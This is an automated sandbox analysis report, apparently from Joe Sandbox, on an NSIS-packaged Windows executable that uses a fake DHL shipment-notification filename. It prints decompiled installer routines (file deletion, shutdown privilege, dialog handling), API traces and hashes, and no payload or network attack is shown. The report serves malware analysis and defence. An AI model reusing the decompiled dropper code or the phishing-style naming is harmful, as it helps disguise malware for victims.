                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                        • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,0079F748,00000001), ref: 00403B27
                        • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
                        • ExitProcess.KERNEL32(?), ref: 00403B72
                        • OleUninitialize.OLE32(?), ref: 00403B77
                        • ExitProcess.KERNEL32 ref: 00403B91
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                        • ExitWindowsEx.USER32 ref: 00403C04
                        • ExitProcess.KERNEL32 ref: 00403C25
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                        • String ID: "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                        • API String ID: 2292928366-499577634
                        • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                        • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                        • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                        • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 390 405d7a-405da0 call 406045 393 405da2-405db4 DeleteFileW 390->393 394 405db9-405dc0 390->394 395 405f36-405f3a 393->395 396 405dc2-405dc4 394->396 397 405dd3-405de3 call 40666e 394->397 399 405ee4-405ee9 396->399 400 405dca-405dcd 396->400 403 405df2-405df3 call 405f89 397->403 404 405de5-405df0 lstrcatW 397->404 399->395 402 405eeb-405eee 399->402 400->397 400->399 405 405ef0-405ef6 402->405 406 405ef8-405f00 call 4069a4 402->406 407 405df8-405dfc 403->407 404->407 405->395 406->395 414 405f02-405f16 call 405f3d call 405d32 406->414 410 405e08-405e0e lstrcatW 407->410 411 405dfe-405e06 407->411 413 405e13-405e2f lstrlenW FindFirstFileW 410->413 411->410 411->413 415 405e35-405e3d 413->415 416 405ed9-405edd 413->416 432 405f18-405f1b 414->432 433 405f2e-405f31 call 4056d0 414->433 419 405e5d-405e71 call 40666e 415->419 420 405e3f-405e47 415->420 416->399 418 405edf 416->418 418->399 430 405e73-405e7b 419->430 431 405e88-405e93 call 405d32 419->431 422 405e49-405e51 420->422 423 405ebc-405ecc FindNextFileW 420->423 422->419 427 405e53-405e5b 422->427 423->415 426 405ed2-405ed3 FindClose 423->426 426->416 427->419 427->423 430->423 435 405e7d-405e86 call 405d7a 430->435 443 405eb4-405eb7 call 4056d0 431->443 444 405e95-405e98 431->444 432->405 434 405f1d-405f2c call 4056d0 call 40642e 432->434 433->395 434->395 435->423 443->423 446 405e9a-405eaa call 4056d0 call 40642e 444->446 447 405eac-405eb2 444->447 446->423 447->423
                        C-Code - Quality: 98%
                        			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                        0x00405d84
                        0x00405d89
                        0x00405d92
                        0x00405d95
                        0x00405d9d
                        0x00405da0
                        0x00405da3
                        0x00405dab
                        0x00405dad
                        0x00405dae
                        0x00000000
                        0x00405dae
                        0x00405db9
                        0x00405dbc
                        0x00405dbc
                        0x00405dbc
                        0x00405dc0
                        0x00405dd3
                        0x00405dda
                        0x00405ddf
                        0x00405de3
                        0x00405df3
                        0x00405de5
                        0x00405deb
                        0x00405deb
                        0x00405df8
                        0x00405dfc
                        0x00405e08
                        0x00405e0e
                        0x00405e13
                        0x00405e19
                        0x00405e24
                        0x00405e2a
                        0x00405e2c
                        0x00405e2f
                        0x00405ed9
                        0x00405ed9
                        0x00405edd
                        0x00405edf
                        0x00405edf
                        0x00405edf
                        0x00405edf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405e35
                        0x00405e35
                        0x00405e35
                        0x00405e3d
                        0x00405e5d
                        0x00405e65
                        0x00405e6a
                        0x00405e71
                        0x00405e8c
                        0x00405e91
                        0x00405e93
                        0x00405eb7
                        0x00405e95
                        0x00405e95
                        0x00405e98
                        0x00405eac
                        0x00405e9a
                        0x00405e9d
                        0x00405ea5
                        0x00405ea5
                        0x00405e98
                        0x00405e73
                        0x00405e79
                        0x00405e7b
                        0x00405e81
                        0x00405e81
                        0x00405e7b
                        0x00000000
                        0x00405e71
                        0x00405e3f
                        0x00405e47
                        0x00000000
                        0x00000000
                        0x00405e49
                        0x00405e51
                        0x00000000
                        0x00000000
                        0x00405e53
                        0x00405e5b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405ebc
                        0x00405ec4
                        0x00405eca
                        0x00405eca
                        0x00405ed3
                        0x00000000
                        0x00405ed3
                        0x00405dfe
                        0x00405e06
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405dc2
                        0x00405dc2
                        0x00405dc4
                        0x00405ee4
                        0x00405ee6
                        0x00405ee9
                        0x00405f3a
                        0x00405f3a
                        0x00405f3a
                        0x00405eeb
                        0x00405eee
                        0x00405ef9
                        0x00405efe
                        0x00405f00
                        0x00000000
                        0x00000000
                        0x00405f03
                        0x00405f0f
                        0x00405f14
                        0x00405f16
                        0x00000000
                        0x00405f31
                        0x00405f18
                        0x00405f1b
                        0x00000000
                        0x00000000
                        0x00405f20
                        0x00000000
                        0x00405f27
                        0x00405ef0
                        0x00405ef0
                        0x00000000
                        0x00405ef0
                        0x00405dca
                        0x00405dcd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405dcd

                        APIs
                        • DeleteFileW.KERNELBASE(?,?,76CDFAA0,76CDF560,00000000), ref: 00405DA3
                        • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E14
                        • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E24
                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                        • FindClose.KERNELBASE(00000000), ref: 00405ED3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: .$.$\*.*
                        • API String ID: 2035342205-3749113046
                        • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                        • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                        • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                        • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}




                        0x004069af
                        0x004069b8
                        0x00000000
                        0x004069c5
                        0x004069bb
                        0x00000000

                        APIs
                        • FindFirstFileW.KERNELBASE(76CDFAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004069AF
                        • FindClose.KERNEL32(00000000), ref: 004069BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                        • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                        • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                        • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 144 4040ef-4040f8 142->144 145 4042a2-4042b7 143->145 146 404255-404290 GetDlgItem * 2 call 4045ca KiUserCallbackDispatcher call 40140b 143->146 150 4040fa-404107 SetWindowPos 144->150 151 40410d-404114 144->151 148 4042f7-4042fc call 404616 145->148 149 4042b9-4042bc 145->149 167 404295-40429d 146->167 163 404301-40431c 148->163 153 4042be-4042c9 call 401389 149->153 154 4042ef-4042f1 149->154 150->151 156 404116-404130 ShowWindow 151->156 157 404158-40415e 151->157 153->154 180 4042cb-4042ea SendMessageW 153->180 154->148 162 404597 154->162 164 404231-40423f call 404631 156->164 165 404136-404149 GetWindowLongW 156->165 159 404160-404172 DestroyWindow 157->159 160 404177-40417a 157->160 168 404574-40457a 159->168 170 40417c-404188 SetWindowLongW 160->170 171 40418d-404193 160->171 169 404599-4045a0 162->169 174 404325-40432b 163->174 175 40431e-404320 call 40140b 163->175 164->169 165->164 166 40414f-404152 ShowWindow 165->166 166->157 167->145 168->162 176 40457c-404582 168->176 170->169 171->164 179 404199-4041a8 GetDlgItem 171->179 177 404331-40433c 174->177 178 404555-40456e DestroyWindow EndDialog 174->178 175->174 176->162 183 404584-40458d ShowWindow 176->183 177->178 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 177->184 178->168 185 4041c7-4041ca 179->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 179->186 180->169 183->162 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->162 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->164 196 40421b-40422b SendMessageW 192->196 198 4041e7-4041ed 192->198 193->196 197 4041dc-4041de 193->197 196->164 197->191 201 404204-40420d call 40140b 198->201 202 4041ef-4041f5 call 40140b 198->202 201->164 211 40420f-404219 201->211 209 4041fb 202->209 209->191 211->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->163 233 40446a-40446c 222->233 233->163 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->168 238 4044af-4044dc CreateDialogParamW 235->238 236->162 237 404484-40448a 236->237 237->163 239 404490 237->239 238->168 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 40453b-404553 ShowWindow call 404616 240->245 245->168
                        C-Code - Quality: 84%
                        			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                        0x004040d6
                        0x004040dd
                        0x00404244
                        0x00404248
                        0x0040424c
                        0x0040424e
                        0x00404253
                        0x0040425e
                        0x00404269
                        0x0040426e
                        0x00404270
                        0x00404272
                        0x00404275
                        0x0040427a
                        0x00404288
                        0x00404295
                        0x0040429c
                        0x0040429c
                        0x0040429d
                        0x0040429d
                        0x004042a2
                        0x004042a8
                        0x004042af
                        0x004042b5
                        0x004042b7
                        0x004042f7
                        0x004042fc
                        0x00404301
                        0x00404301
                        0x00404306
                        0x0040430f
                        0x00404311
                        0x00404316
                        0x0040431c
                        0x00404320
                        0x00404320
                        0x00404325
                        0x0040432b
                        0x00000000
                        0x00000000
                        0x00404336
                        0x0040433c
                        0x00000000
                        0x00000000
                        0x00404345
                        0x0040434d
                        0x00404352
                        0x00404355
                        0x0040435b
                        0x00404360
                        0x00404363
                        0x00404369
                        0x0040436e
                        0x00404371
                        0x00404377
                        0x0040437f
                        0x00404385
                        0x0040438b
                        0x0040438f
                        0x00404396
                        0x00404396
                        0x00404396
                        0x004043a0
                        0x004043b2
                        0x004043be
                        0x004043c3
                        0x004043cd
                        0x004043d3
                        0x004043d5
                        0x004043da
                        0x004043d7
                        0x004043d7
                        0x004043d7
                        0x004043ea
                        0x00404402
